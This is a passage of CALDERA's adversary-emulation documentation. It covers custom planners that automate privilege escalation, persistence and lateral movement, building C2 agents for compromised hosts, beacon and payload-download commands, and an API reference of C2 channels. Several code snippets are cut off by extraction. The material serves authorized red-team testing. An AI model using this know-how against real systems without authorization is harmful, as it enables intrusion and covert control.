@check_authorization
@template('abilities.html')
async def splash(self, request):
abilities = await self.services.get('data_svc').locate('abilities')
return(dict(abilities=[a.display for a in abilities]))
Restart CALDERA and navigate to the home page. Be sure to run server.py with the --fresh flag to flush the
previous object store database.
You should see a new “abilities” tab at the top, clicking on this should navigate you to the new abilities.html page you
created.
Any Markdown or reStructured text in the plugin’s docs/ directory will appear in the documentation generated by the
fieldmanual plugin. Any resources, such as images and videos, will be added as well.
TWENTYSEVEN
For any desired planner decision logic not encapsulated in the default batch planner (or any other existing planner),
CALDERA requires that a new planner be implemented to encode such decision logic.
27.1 Buckets
The cornerstone of how planners make decisions is centered on a concept we call ‘buckets’. Buckets denote the planner’s
state machine and are intended to correspond to buckets of CALDERA abilities. Within a planner, macro level decision
control is encoded by specifying which buckets (i.e. states) follow other buckets, thus forming a bucket state machine.
Micro level decisions are made within the buckets, by specifying any logic detailing which abilities to send to agents
and when to do so.
CALDERA abilities are also tagged by the buckets they are in. By default, when abilities are loaded by CALDERA, they
are tagged with the bucket of the ATT&CK technique they belong to. CALDERA abilities can also be tagged/untagged
at will by any planner as well, before starting the operation or at any point in it. The intent is for buckets to work with
the abilities that have been tagged for that bucket, but this is by no means enforced.
Let’s dive into creating a planner to see the power and flexibility of the CALDERA planner component. For this
example, we will implement a planner that will carry out the following state machine:
125
caldera
The planner will consist of 5 buckets: Privilege Escalation, Collection, Persistence, Discovery, and Lateral Movement.
As implied by the state machine, this planner will use the underlying adversary abilities to attempt to spread to as
many hosts as possible and establish persistence. As an additional feature, if an agent cannot obtain persistence due to
unsuccessful privilege escalation attempts, then the agent will execute collection abilities immediately in case it loses
access to the host.
This document will walk through creating three basic components of a planner module (initialization, entrypoint
method, and bucket methods), creating the planner data object, and applying the planner to a new operation.
We will create a python module called privileged_persistence.py and nest it under app/ in the mitre/
stockpile plugin at plugins/stockpile/app/privileged_persistence.py.
First, lets build the static initialization of the planner:
class LogicalPlanner:
self.next_bucket = 'privilege_escalation'
The __init__() method for a planner must take and store the required arguments for the operation instance,
planning_svc handle, and any supplied stopping_conditions.
Additionally, self.stopping_condition_met, which is used to control when to stop bucket execution, is initially
set to False. During bucket execution, this property will be set to True if any facts gathered by the operation exactly
match (both name and value) any of the facts provided in stopping_conditions. When this occurs, the operation
will stop running new abilities.
The self.state_machine variable is an optional list enumerating the base line order of the planner state machine.
This ordered list does not control the bucket execution order, but is used to define a base line state machine that we
can refer back to in our decision logic. This will be demonstrated in our example below when we create the bucket
methods.
self.next_bucket = 'privilege_escalation'
The self.next_bucket variable holds the next bucket to be executed. This is the next bucket that the planner will
enter and whose bucket method will next control the planning logic. Initially, we set self.next_bucket to the first
bucket the planner will begin in. We will modify self.next_bucket from within our bucket methods in order to
specify the next bucket to execute.
Additional Planner class variables
It is also important to note that a planner may define any required variables that it may need. For instance, many custom
planners require information to be passed from one bucket to another during execution. This can be done by creating
class variables to store information which can be accessed within any bucket method and will persist between bucket
transitions.
Now, lets the define the planner’s entrypoint method: execute
execute is where the planner starts and where any runtime initialization is done. execute_planner works by execut-
ing the bucket specified by self.next_bucket until the self.stopping_condition_met variable is set to True.
For our planner, no further runtime initialization is required in the execute method.
Finally, lets create our bucket methods:
if successful:
self.next_bucket = 'persistence'
(continues on next page)
if lateral_movement_unlocked:
self.next_bucket = await self.planning_svc.default_next_bucket('discovery',␣
˓→self.state_machine)
else:
# planner will transtion from this bucket to being done
self.next_bucket = None
These bucket methods are where all inter-bucket transitions and intra-bucket logic will be encoded. For every bucket
in our planner state machine, we must define a corresponding bucket method.
Lets look at each of the bucket methods in detail:
• privilege_escalation() - We first use get_links planning service utility to retrieve all abilities (links)
tagged as privilege escalation from the operation adversary. We then push these links to the agent with apply
and wait for these links to complete with wait_for_links_completion(), both from the operation utility.
After the links complete, we check for the creation of custom facts that indicate the privilege escalation was
successful (Note: this assumes the privilege escalation abilities we are using create custom facts in the format
“{paw}.privilege.root” or “{paw}.privilege.admin” with values of True or False). If privilege escalation was
successful, set the next bucket to be executed to persistence, otherwise collection.
• persistence(), collection(), lateral_movement() - These buckets have no complex logic, we just want
to execute all links available and are tagged for the given bucket. We can use the exhaust_bucket() planning
service utility to apply all links for the given bucket tag. Before exiting, we set the next bucket as desired. Note
that in the persistence() bucket we use the default_next_bucket() planning service utility, which will
automatically choose the next bucket after “persistence” in the provided self.state_machine ordered list.
• discovery() - This bucket starts by running all discovery ability links available. Then we utilize a useful trick
to determine if the planner should proceed to the lateral movement bucket. We use get_links() to determine
if the discovery links that were just executed ended up unlocking ability links for lateral movement. From there
we set the next bucket accordingly.
Additional Notes on Privileged Persistence Planner
• You may have noticed that the privileged_persistence planner is only notionally more sophisticated than running
certain default adversary profiles. This is correct. If you can find or create an adversary profile whose ability
enumeration (i.e. order) can carry out your desired operational progression between abilities and can be executed
in batch (by the default batch planner) or in a sequentially atomic order (by atmomic planner), it is advised to
go that route. However, any decision logic above those simple planners will have to be implemented in a new
planner.
• The privileged persistence planner did not have explicit logic to handle multiple agents. We just assumed the
planner buckets would only have to handle a single active agent given the available ability links returned from
the planning service.
In order to use this planner inside CALDERA, we will create the following YAML file at plugins/stockpile/data/
planners/80efdb6c-bb82-4f16-92ae-6f9d855bfb0e.yml:
---
id: 80efdb6c-bb82-4f16-92ae-6f9d855bfb0e
name: privileged_persistence
description: |
Privileged Persistence Planner: Attempt to spread to as many hosts as possible and␣
˓→establish persistence.
This will create a planner in CALDERA which will call the module we’ve created at plugins.stockpile.app.
privileged_persistence.
NOTE: For planners intended to be used with profiles containing repeatable abilities,
allow_repeatable_abilities: True must be added to the planner YAML file. Otherwise, CALDERA
will default the value to False and assume the planner does not support repeatable abilities.
To use the planner, create an Operation and select the “Use privileged_persistence planner” option in the planner
dropdown (under Autonomous). Any selected planner will use the abilities in the selected adversary profile during the
operation. Since abilities are automatically added to buckets which correlate to MITRE ATT&CK tactics, any abilities
with the following tactics will be executed by the privileged_persistence planner: privilege_escalation, persistence,
collection, discovery, and lateral_movement.
Custom planners do not have to use the buckets approach to work with the CALDERA operation interface if not desired.
Here is a minimal planner that will still work with the operation interface.
class LogicalPlanner:
In addition to the basic (name, value) information present in facts and documented in Basic Usage, there are some
additional fields that may prove useful when developing and working with planners.
As of Caldera v4.0, facts now have the new origin_type and source fields, which identify how Caldera learned that
fact. There are 5 possible values for the origin_type field:
• DOMAIN - This fact originates from Caldera’s general knowledge about environments
• SEEDED - This fact originates from a source file, which was used to seed an operation
• LEARNED - This fact originates from an operation, which uncovered it
• IMPORTED - This fact originates from a previous operation, or another pre-existing fact collection
• USER - This fact originates from a User, i.e. was entered through the GUI
The source field, on the other hand, contains a UUID4 that corresponds to the originating object described by
origin_type.
As of Caldera v4.0, facts also now have new fields in them that track the Links and Relationships that have con-
tributed to that fact in some way, accessible as links and relationships respectively. Each of these properties is
a list of corresponding objects, with links corresponding to all Link objects that generated/identified this Fact, and
relationships corresponding to all Relationship objects that reference this Fact.
One potentially useful Fact property for planners is the score property. This tracks how many times a fact has been
used successfully in links, allowing facts to have an inherent ‘weight’ to them when they are useful. Facts start with a
score of 1, a value that typically increases by 1 every time a link uses it (though scores can be increased or decreased
by varying amounts by other means). For context, a link’s score, when generated by Caldera’s core planning services,
is simply the sum of the scores of the facts utilized by that link.
Within a planner, all public utilities are available from self.operation. The following may assist in planner devel-
opment:
• apply() - Add a link to the operation.
• wait_for_links_completion() - Wait for started links to be completed.
• all_facts() - Return a list of all facts collected during an operation. These will include both learned and
seeded (from the operation source) facts.
• has_fact() - Search an operation for a fact with a particular name and value.
• all_relationships() - Return a list of all relationships collected during an operation.
• active_agents() - Find all agents in the operation that have been active since operation start.
As of Caldera V4.0, a new service has been added to the core of Caldera for use with planners and other components
that make use of facts: the Knowledge Service. This service allows the creation, retrieval, updating, and deletion of
facts, relationships, and rules. Typically, users should not need to interact with this service directly, as common usage
patterns are already baked into core objects such as Link, Agent, and Operation, but the service can be accessed by
using BaseService.get_service('knowledge_svc'), should the need arise for more complex interactions with
the available data. The Knowledge Service stores data persistently in the same manner that Caldera’s internal Data
Service does (by writing it to a file on shutdown), and can be cleared in much the same way if necessary (by using the
--fresh argument on the server).
The following methods are available from the Knowledge Service:
app.objects.secondclass.c_fact
• KnowledgeService.add_fact(fact) - Add a fact to the Knowledge Service’s datastore. The fact argument
must be an already instantiated Fact() object.
• KnowledgeService.delete_fact(criteria) - Remove matching facts from the datastore. The criteria
argument should be a dictionary with fields to match existing facts against for selection.
• KnowledgeService.get_facts(criteria) - Retrieve matching facts from the datastore. The criteria
argument should be a dictionary with fields to match existing facts against for selection.
• KnowledgeService.update_fact(criteria, updates) - Update an existing fact in the datastore. The
criteria argument should be a dictionary with fields to match existing facts against for selection, and updates
should be a dictionary with fields to change and their new values.
• KnowledgeService.get_fact_origin(fact) - Identifies the location/source of a provided fact. The fact
argument can be either a name to search for or a full blown Fact object. The return is a tuple of the ID corre-
sponding to the origin object for this fact, and the type of origin object.
app.objects.secondclass.c_relationship
app.objects.secondclass.c_rule
• KnowledgeService.add_rule(rule) - Add a rule to the datastore. The rule argument must be an already
existing Rule() object.
• KnowledgeService.delete_rule(criteria) - Remove a rule from the datastore. The criteria argument
should be a dictionary containing fields and values to match existing rules against.
• KnowledgeService.get_rules(criteria) - Retrieve matching rules from the datastore. The criteria
argument should be a dictionary containing files to match existing rules against.
All objects added to the Knowledge service are checked against existing objects in order to enforce de-duplication,
with one caveat. As origin is tracked for facts generated by links in the current implementation, this means duplicate
facts created during different operations can exist in the fact store simultaneously. Facts/Relationships are usually
automatically added to the fact store by Link objects as part of the process of parsing output, though they can be added
manually should the need arise.
TWENTYEIGHT
Building your own agent is a way to create a unique - or undetectable - footprint on compromised machines. Our default
agent, Sandcat, is a representation of what an agent can do. This agent is written in GoLang and offers an extensible
collection of command-and-control (C2) protocols, such as communicating over HTTP or GitHub Gist.
You can extend Sandcat by adding your own C2 protocols in place or you can follow this guide to create your own agent
from scratch.
Agents are processes which are deployed on compromised hosts and connect with the C2 server periodically for in-
structions. An agent connects to the server through a contact, which is a specific connection point on the server.
Each contact is defined in an independent Python module and is registered with the contact_svc when the server starts.
There are currently several built-in contacts available: http, tcp, udp, websocket, gist (via Github), and dns.
For additional stealth, supporting agents can use communication tunnels to tunnel built-in contacts like HTTP, TCP,
and UDP. For more information on C2 communication tunneling, see the C2 tunneling section.
Start by getting a feel for the HTTP endpoint, which are located in the contacts/contact_http.py module.
POST /beacon
28.2.1 Part #1
135
caldera
• group: Either red or blue. This determines if your agent will be used as a red or blue agent.
• paw: The current unique identifier for the agent, either initially generated by the agent itself or provided by the
C2 on initial beacon.
• username: The username running the agent
• architecture: The architecture of the host
• executors: A list of executors allowed on the host
• privilege: The privilege level of the agent process, either User or Elevated
• pid: The process identifier of the agent
• ppid: The process identifier of the agent’s parent process
• location: The location of the agent on disk
• exe_name: The name of the agent binary file
• host_ip_addrs: A list of valid IPv4 addresses on the host
• proxy_receivers: a dict (key: string, value: list of strings) that maps a peer-to-peer proxy protocol name to a list
of addresses that the agent is listening on for peer-to-peer client requests.
• deadman_enabled: a boolean that tells the C2 server whether or not this agent supports deadman abilities. If
this value is not provided, the server assumes that the agent does not support deadman abilities.
• upstream_dest: The “next hop” upstream destination address (e.g. IP or FQDN) that the agent uses to reach
the C2 server. If the agent is using peer-to-peer communication to reach the C2, this value will contain the peer
address rather than the C2 address.
At this point, you are ready to make a POST request with the profile to the /beacon endpoint. You should get back:
1) The recommended number of seconds to sleep before sending the next beacon
2) The recommended number of seconds (watchdog) to wait before killing the agent, once the server is unreachable
(0 means infinite)
3) A list of instructions - base64 encoded.
profile=$(echo '{"server":"http://127.0.0.1:8888","platform":"darwin","executors":["sh"]}
˓→' | base64)
If you get a malformed base64 error, that means the operating system you are using is adding an empty space to the
profile variable. You can prove this by
echo $profile
To resolve this error, simply change the line to (note the only difference is ‘-w 0’):
profile=$(echo '{"server":"http://127.0.0.1:8888","platform":"darwin","executors":["sh"]}
˓→' | base64 -w 0)
The paw property returned back from the server represents a unique identifier for your new agent. Each
time you call the /beacon endpoint without this paw, a new agent will be created on the server - so you
should ensure that future beacons include it.
You can now navigate to the CALDERA UI, click into the agents tab and view your new agent.
28.2.2 Part #2
28.2.3 Part #3
Inside each instruction, there is an optional payload property that contains a filename of a file to download before
running the instruction. To implement this, add a file download capability to your agent, directing it to the /file/download
endpoint to retrieve the file:
payload='some_file_name.txt"
curl -X POST -H "file:$payload" http://localhost:8888/file/download > some_file_name.txt
28.2.4 Part 4
Inside each instruction, there is an optional uploads property that contains a list of filenames to upload to the C2 after
running the instruction and submitting the execution results. To implement this, add a file upload capability to your
agent. If using the HTTP contact, the file upload should hit the /file/upload upload endpoint of the server.
28.2.5 Part #5
You should implement the watchdog configuration. This property, passed to the agent in every beacon, contains the
number of seconds to allow a dead beacon before killing the agent.
Additionally, you may want to take advantage of CALDERA’s lateral movement tracking capabilities. CALDERA’s
current implementation for tracking lateral movement depends on passing the ID of the Link spawning the agent as an
argument to the agent’s spawn command and upon the agent’s check in, for this Link ID to be returned as part of the
agent’s profile. The following section explains how lateral movement tracking has been enabled for the default agent,
Sandcat.
28.3.1 Sandcat
An example Sandcat spawn command has been copied from the Service Creation ability and included below for refer-
ence:
If the CALDERA server is running on http://192.168.0.1:8888 and the ID of the Link with the spawn command
is cd63fdbb-0f3a-49ea-b4eb-306a3ff40f81, the populated command will appear as:
The Sandcat agent stores the value of this global variable in its profile, which is then returned to the CALDERA server
upon first check-in as a key\value pair origin_link_id : cd63fdbb-0f3a-49ea-b4eb-306a3ff40f81 in the
JSON dictionary. The CALDERA server will automatically store this pair when creating the Agent object and use it
when generating the Attack Path graph in the Debrief plugin.
NOTE: The origin_link_id key is optional and not required for the CALDERA server to register and use new
agents as expected. It is only required to take advantage of the lateral movement tracking in the Debrief plugin.
TWENTYNINE
APP
29.1.1 Subpackages
app.api namespace
Subpackages
app.api.packs namespace
Submodules
app.api.packs.advanced module
class app.api.packs.advanced.AdvancedPack(services)
Bases: BaseWorld
async enable()
app.api.packs.campaign module
class app.api.packs.campaign.CampaignPack(services)
Bases: BaseWorld
async enable()
app.api.v2 package
Subpackages
app.api.v2.handlers namespace
Submodules
139
caldera
app.api.v2.handlers.ability_api module
class app.api.v2.handlers.ability_api.AbilityApi(services)
Bases: BaseObjectApi
add_routes(app: Application)
app.api.v2.handlers.adversary_api module
class app.api.v2.handlers.adversary_api.AdversaryApi(services)
Bases: BaseObjectApi
add_routes(app: Application)
app.api.v2.handlers.agent_api module
class app.api.v2.handlers.agent_api.AgentApi(services)
Bases: BaseObjectApi
add_routes(app: Application)
app.api.v2.handlers.base_api module
property log
app.api.v2.handlers.base_object_api module
app.api.v2.handlers.config_api module
class app.api.v2.handlers.config_api.ConfigApi(services)
Bases: BaseApi
add_routes(app: Application)
async get_config_with_name(request)
async update_agents_config(request)
async update_main_config(request)
app.api.v2.handlers.contact_api module
class app.api.v2.handlers.contact_api.ContactApi(services)
Bases: BaseApi
add_routes(app: Application)
app.api.v2.handlers.fact_api module
class app.api.v2.handlers.fact_api.FactApi(services)
Bases: BaseObjectApi
async add_facts(request: Request)
add_routes(app: Application)
app.api.v2.handlers.fact_source_api module
class app.api.v2.handlers.fact_source_api.FactSourceApi(services)
Bases: BaseObjectApi
add_routes(app: Application)
app.api.v2.handlers.health_api module
class app.api.v2.handlers.health_api.HealthApi(services)
Bases: BaseApi
add_routes(app: Application)
async get_health_info(request)
app.api.v2.handlers.obfuscator_api module
class app.api.v2.handlers.obfuscator_api.ObfuscatorApi(services)
Bases: BaseObjectApi
add_routes(app: Application)
app.api.v2.handlers.objective_api module
class app.api.v2.handlers.objective_api.ObjectiveApi(services)
Bases: BaseObjectApi
add_routes(app: Application)
app.api.v2.handlers.operation_api module
class app.api.v2.handlers.operation_api.OperationApi(services)
Bases: BaseObjectApi
add_routes(app: Application)
app.api.v2.handlers.planner_api module
class app.api.v2.handlers.planner_api.PlannerApi(services)
Bases: BaseObjectApi
add_routes(app: Application)
app.api.v2.handlers.plugins_api module
class app.api.v2.handlers.plugins_api.PluginApi(services)
Bases: BaseObjectApi
add_routes(app: Application)
app.api.v2.handlers.schedule_api module
class app.api.v2.handlers.schedule_api.ScheduleApi(services)
Bases: BaseObjectApi
add_routes(app: Application)
app.api.v2.managers namespace
Submodules
app.api.v2.managers.ability_api_manager module
async update_on_disk_object(obj: Any, data: dict, ram_key: str, id_property: str, obj_class: type)
app.api.v2.managers.adversary_api_manager module
app.api.v2.managers.agent_api_manager module
app.api.v2.managers.base_api_manager module
async create_on_disk_object(data: dict, access: dict, ram_key: str, id_property: str, obj_class: type)
async update_on_disk_object(obj: Any, data: dict, ram_key: str, id_property: str, obj_class: type)
app.api.v2.managers.config_api_manager module
update_main_config(prop, value)
app.api.v2.managers.config_api_manager.filter_sensitive_props(config_map)
Return a copy of config_map with top-level sensitive keys removed.
app.api.v2.managers.config_api_manager.is_sensitive_prop(prop)
Return True if the input prop is a sensitive configuration property.
app.api.v2.managers.contact_api_manager module
app.api.v2.managers.fact_api_manager module
async verify_fact_integrity(data)
async verify_operation_state(new_fact)
async verify_relationship_integrity(data)
app.api.v2.managers.operation_api_manager module
class app.api.v2.managers.operation_api_manager.OperationApiManager(services)
Bases: BaseApiManager
build_ability(data: dict, executor: Executor)
validate_link_data(link_data: dict)
app.api.v2.managers.schedule_api_manager module
class app.api.v2.managers.schedule_api_manager.ScheduleApiManager(services)
Bases: OperationApiManager
create_object_from_schema(schema: SchemaMeta, data: dict, access: Access)
app.api.v2.schemas namespace
Submodules
app.api.v2.schemas.base_schemas module
app.api.v2.schemas.caldera_info_schemas module
class Meta
Bases: object
ordered = True
app.api.v2.schemas.config_schemas module
app.api.v2.schemas.deploy_command_schemas module
app.api.v2.schemas.error_schemas module
Submodules
app.api.v2.errors module
app.api.v2.responses module
app.api.v2.security module
app.api.v2.security.authentication_exempt(handler)
Mark the endpoint handler as not requiring authentication.
Note:
This only applies when the authentication_required_middleware is being used.
app.api.v2.security.authentication_required_middleware_factory(auth_svc)
Enforce authentication on every endpoint within an web application.
Note:
Any endpoint handler can opt-out of authentication using the @authentication_exempt decorator.
app.api.v2.security.is_handler_authentication_exempt(handler)
Return True if the endpoint handler is authentication exempt.
app.api.v2.validation module
app.api.v2.validation.check_not_empty_string(value, name=None)
app.api.v2.validation.check_positive_integer(value, name=None)
Module contents
app.api.v2.make_app(services)
Submodules
app.api.rest_api module
class app.api.rest_api.RestApi(services)
Bases: BaseWorld
async download_exfil_file(**params)
async download_file(request)
async enable()
async landing(request)
async login(request)
async logout(request)
async rest_core(**params)
async rest_core_info(**params)
async upload_file(request)
async validate_login(request)
app.contacts namespace
Subpackages
app.contacts.handles namespace
Submodules
app.contacts.handles.h_beacon module
class app.contacts.handles.h_beacon.Handle(tag)
Bases: object
async static run(message, services, caller)
app.contacts.tunnels namespace
Submodules
app.contacts.tunnels.tunnel_ssh module
Parameters
conn (SSHServerConnection) – The connection which was successfully opened
connection_requested(dest_host, dest_port, orig_host, orig_port)
Handle a direct TCP/IP connection request
This method is called when a direct TCP/IP connection request is received by the server. Applications
wishing to accept such connections must override this method.
To allow standard port forwarding of data on the connection to the requested destination host and port, this
method should return True.
To reject this request, this method should return False to send back a “Connection refused” response or
raise an ChannelOpenError exception with the reason for the failure.
If the application wishes to process the data on the connection itself, this method should return either an
SSHTCPSession object which can be used to process the data received on the channel or a tuple consisting
of of an SSHTCPChannel object created with create_tcp_channel() and an SSHTCPSession, if the
application wishes to pass non-default arguments when creating the channel.
If blocking operations need to be performed before the session can be created, a coroutine which returns
an SSHTCPSession object can be returned instead of the session iself. This can be either returned directly
or as a part of a tuple with an SSHTCPChannel object.
By default, all connection requests are rejected.
Parameters
• dest_host (str) – The address the client wishes to connect to
• dest_port (int) – The port the client wishes to connect to
• orig_host (str) – The address the connection was originated from
• orig_port (int) – The port the connection was originated from
Returns
One of the following:
• An SSHTCPSession object or a coroutine which returns an SSHTCPSession
• A tuple consisting of an SSHTCPChannel and the above
• A callable or coroutine handler function which takes AsyncSSH stream objects for reading
from and writing to the connection
• A tuple consisting of an SSHTCPChannel and the above
• True to request standard port forwarding
• False to refuse the connection
Raises
ChannelOpenError if the connection shouldn’t be accepted
password_auth_supported()
Return whether or not password authentication is supported
This method should return True if password authentication is supported. Applications wishing to support
it must have this method return True and implement validate_password() to return whether or not the
password provided by the client is valid for the user being authenticated.
By default, this method returns False indicating that password authentication is not supported.
Returns
A bool indicating if password authentication is supported or not
validate_password(username, password)
Return whether password is valid for this user
This method should return True if the specified password is a valid password for the user being authenti-
cated. It must be overridden by applications wishing to support password authentication.
If the password provided is valid but expired, this method may raise PasswordChangeRequired to re-
quest that the client provide a new password before authentication is allowed to complete. In this case, the
application must override change_password() to handle the password change request.
This method may be called multiple times with different passwords provided by the client. Appli-
cations may wish to limit the number of attempts which are allowed. This can be done by having
password_auth_supported() begin returning False after the maximum number of attempts is exceeded.
If blocking operations need to be performed to determine the validity of the password, this method may be
defined as a coroutine.
By default, this method returns False for all passwords.
Parameters
• username (str) – The user being authenticated
• password (str) – The password sent by the client
Returns
A bool indicating if the specified password is valid for the user being authenticated
Raises
PasswordChangeRequired if the password provided is expired and needs to be changed
class app.contacts.tunnels.tunnel_ssh.Tunnel(services)
Bases: BaseWorld
server_factory()
async start()
Submodules
app.contacts.contact_dns module
class app.contacts.contact_dns.Contact(services)
Bases: BaseWorld
async start()
authoritative_resp_flag = 1024
get_opcode()
get_response_code()
has_standard_query()
is_query()
is_response()
opcode_mask = 30720
opcode_offset = 11
query_response_flag = 32768
recursion_available()
recursion_available_flag = 128
recursion_desired()
recursion_desired_flag = 256
response_code_mask = 15
truncated()
truncated_flag = 512
class app.contacts.contact_dns.DnsRecordType(value)
Bases: Enum
An enumeration.
A = 1
AAAA = 28
CNAME = 5
NS = 2
TXT = 16
get_bytes(byteorder='big')
max_ttl = 86400
max_txt_size = 255
min_ttl = 300
standard_pointer = 49164
class app.contacts.contact_dns.DnsResponseCodes(value)
Bases: Enum
An enumeration.
NXDOMAIN = 3
SUCCESS = 0
FileUploadData = 'ud'
FileUploadRequest = 'ur'
InstructionDownload = 'id'
PayloadDataDownload = 'pd'
PayloadFilenameDownload = 'pf'
PayloadRequest = 'pr'
class StoredResponse(data)
Bases: object
finished_reading()
read_data(num_bytes)
export_contents()
is_complete()
connection_made(transport)
Called when a connection is made.
The argument is the transport representing the pipe connection. To receive data, wait for data_received()
calls. When the connection is closed, connection_lost() is called.
datagram_received(data, addr)
Called when some datagram is received.
async generate_dns_tunneling_response_bytes(data)
app.contacts.contact_ftp module
class app.contacts.contact_ftp.Contact(services)
Bases: BaseWorld
check_config()
async ftp_server_python_new()
async ftp_server_python_old()
set_up_server()
setup_ftp_users()
async start()
async stop()
async get_payload_file(payload_dict)
app.contacts.contact_gist module
class app.contacts.contact_gist.Contact(services)
Bases: BaseWorld
class GistUpload(upload_id, filename, num_chunks)
Bases: object
add_chunk(chunk_index, contents)
export_contents()
is_complete()
async get_beacons()
Retrieve all GIST beacons for a particular api token :return: the beacons
async get_results()
Retrieve all GIST posted results for a this C2’s api token :return:
async get_uploads()
Retrieve all GIST posted file uploads for this C2’s api token :return: list of (raw content, gist description,
gist filename) tuples for upload GISTs
async gist_operation_loop()
async handle_beacons(beacons)
Handles various beacons types (beacon and results)
async handle_uploads(upload_gist_info)
retrieve_config()
async start()
valid_config(token)
app.contacts.contact_gist.api_access(func)
app.contacts.contact_html module
class app.contacts.contact_html.Contact(services)
Bases: BaseWorld
async start()
app.contacts.contact_http module
class app.contacts.contact_http.Contact(services)
Bases: BaseWorld
async start()
app.contacts.contact_slack module
class app.contacts.contact_slack.Contact(services)
Bases: BaseWorld
class SlackUpload(upload_id, filename, num_chunks)
Bases: object
add_chunk(chunk_index, contents)
export_contents()
is_complete()
async get_beacons()
Retrieve all SLACK beacons for a particular api key :return: the beacons
async get_results()
Retrieve all SLACK posted results for a this C2’s api key :return:
async get_uploads()
Retrieve all SLACK posted file uploads for this C2’s api key :return: list of (raw content, slack description,
slack filename) tuples for upload SLACKs
async handle_beacons(beacons)
Handles various beacons types (beacon and results)
async handle_uploads(upload_slack_info)
retrieve_config()
async slack_operation_loop()
async start()
async valid_config()
app.contacts.contact_slack.api_access(func)
app.contacts.contact_tcp module
class app.contacts.contact_tcp.Contact(services)
Bases: BaseWorld
async operation_loop()
async start()
async refresh()
async send(session_id: int, cmd: str, timeout: int = 60) → Tuple[int, str, str, str]
app.contacts.contact_udp module
class app.contacts.contact_udp.Contact(services)
Bases: BaseWorld
async start()
class app.contacts.contact_udp.Handler(services)
Bases: DatagramProtocol
datagram_received(data, addr)
Called when some datagram is received.
app.contacts.contact_websocket module
class app.contacts.contact_websocket.Contact(services)
Bases: BaseWorld
async start()
async stop()
class app.contacts.contact_websocket.Handler(services)
Bases: object
async handle(socket, path)
app.data_encoders namespace
Submodules
app.data_encoders.base64_basic module
class app.data_encoders.base64_basic.Base64Encoder
Bases: DataEncoder
decode(encoded_data, **_)
Returns b64 decoded bytes.
encode(data, **_)
Returns base64 encoded data.
app.data_encoders.base64_basic.load()
app.data_encoders.plain_text module
class app.data_encoders.plain_text.PlainTextEncoder
Bases: DataEncoder
decode(encoded_data, **_)
encode(data, **_)
app.data_encoders.plain_text.load()
app.learning namespace
Submodules
app.learning.p_ip module
class app.learning.p_ip.Parser
Bases: object
parse(blob)
app.learning.p_path module
class app.learning.p_path.Parser
Bases: object
parse(blob)
app.objects namespace
Subpackages
app.objects.interfaces namespace
Submodules
app.objects.interfaces.i_object module
class app.objects.interfaces.i_object.FirstClassObjectInterface
Bases: ABC
abstract store(ram)
app.objects.secondclass namespace
Submodules
app.objects.secondclass.c_executor module
display_schema = <ExecutorSchema(many=False)>
classmethod is_global_variable(variable)
replace_cleanup(command, payload)
schema = <ExecutorSchema(many=False)>
property test
Get command with app property variables replaced
class app.objects.secondclass.c_executor.ExecutorSchema(*, only: Optional[Union[Sequence[str],
Set[str]]] = None, exclude:
Union[Sequence[str], Set[str]] = (), many:
bool = False, context: Optional[Dict] =
None, load_only: Union[Sequence[str],
Set[str]] = (), dump_only:
Union[Sequence[str], Set[str]] = (),
partial: Union[bool, Sequence[str],
Set[str]] = False, unknown: Optional[str]
= None)
Bases: Schema
build_executor(data, **_)
app.objects.secondclass.c_executor.get_variations(data)
app.objects.secondclass.c_fact module
load_schema = <FactSchema(many=False)>
property name
schema = <FactSchema(many=False)>
property trait
property unique
build_fact(data, **kwargs)
class app.objects.secondclass.c_fact.OriginType(value)
Bases: Enum
An enumeration.
DOMAIN = 0
IMPORTED = 3
LEARNED = 2
SEEDED = 1
USER = 4
app.objects.secondclass.c_goal module
static parse_operator(operator)
satisfied(all_facts=None)
schema = <GoalSchema(many=False)>
remove_properties(data, **_)
app.objects.secondclass.c_instruction module
schema = <InstructionSchema(many=False)>
app.objects.secondclass.c_link module
EVENT_QUEUE_STATUS_CHANGED = 'status_changed'
apply_id(host)
can_ignore()
display_schema = <LinkSchema(many=False)>
is_finished()
classmethod is_global_variable(variable)
is_valid_status(status)
load_schema = <LinkSchema(many=False)>
property pin
property raw_command
replace_origin_link_id()
schema = <LinkSchema(many=False)>
property states
property status
property unique
build_link(data, **kwargs)
fix_ability(link, **_)
fix_executor(link, **_)
prepare_dump(data, **_)
remove_properties(data, **_)
app.objects.secondclass.c_parser module
property unique
prepare_parser(data, **_)
app.objects.secondclass.c_parserconfig module
build_parserconfig(data, **_)
check_edge_target(in_data, **_)
remove_nones(data, **_)
app.objects.secondclass.c_relationship module
property flat_display
classmethod from_json(json)
load_schema = <RelationshipSchema(many=False)>
schema = <RelationshipSchema(many=False)>
property shorthand
property unique
remove_unique(data, **_)
app.objects.secondclass.c_requirement module
property unique
app.objects.secondclass.c_result module
prepare_dump(data, **_)
app.objects.secondclass.c_rule module
app.objects.secondclass.c_variation module
property raw_command
schema = <VariationSchema(many=False)>
app.objects.secondclass.c_visibility module
class app.objects.secondclass.c_visibility.Visibility
Bases: BaseObject
MAX_SCORE = 100
MIN_SCORE = 1
apply(adjustment)
property display
schema = <VisibilitySchema(many=False)>
property score
Submodules
app.objects.c_ability module
async add_bucket(bucket)
add_executor(executor)
Add executor to map
If the executor exists, delete the current entry and add the
new executor to the bottom for FIFO
add_executors(executors)
Create executor map from list of executor objects
display_schema = <AbilitySchema(many=False)>
property executors
find_executor(name, platform)
find_executors(names, platform)
Find executors for matching platform/executor names
Only the first instance of a matching executor will be returned,
as there should not be multiple executors matching a single platform/executor name pair.
Parameters
• names (list(str)) – Executors to search. ex: [‘psh’, ‘cmd’]
• platform (str) – Platform to search. ex: windows
Returns
List of executors ordered based on ordering of names
Return type
list(Executor)
remove_all_executors()
schema = <AbilitySchema(many=False)>
store(ram)
property unique
async which_plugin()
fix_id(data, **_)
app.objects.c_adversary module
has_ability(ability)
schema = <AdversarySchema(many=False)>
store(ram)
property unique
async which_plugin()
fix_id(adversary, **_)
phase_to_atomic_ordering(adversary, **_)
Convert legacy adversary phases to atomic ordering
remove_properties(data, **_)
app.objects.c_agent module
async all_facts()
assign_pending_executor_change()
Return the executor change dict and remove pending change to assign. :return: Dict representing the ex-
ecutor change that is assigned. :rtype: dict(str, str)
async bootstrap(data_svc)
async calculate_sleep()
async capabilities(abilities)
Get abilities that the agent is capable of running :param abilities: List of abilities to check agent capability
:type abilities: List[Ability] :return: List of abilities the agents is capable of running :rtype: List[Ability]
async deadman(data_svc)
property display_name
property executor_change_to_assign
async get_preferred_executor(ability)
Get preferred executor for ability Will return None if the agent is not capable of running any executors in the
given ability. :param ability: Ability to get preferred executor for :type ability: Ability :return: Preferred
executor or None :rtype: Union[Executor, None]
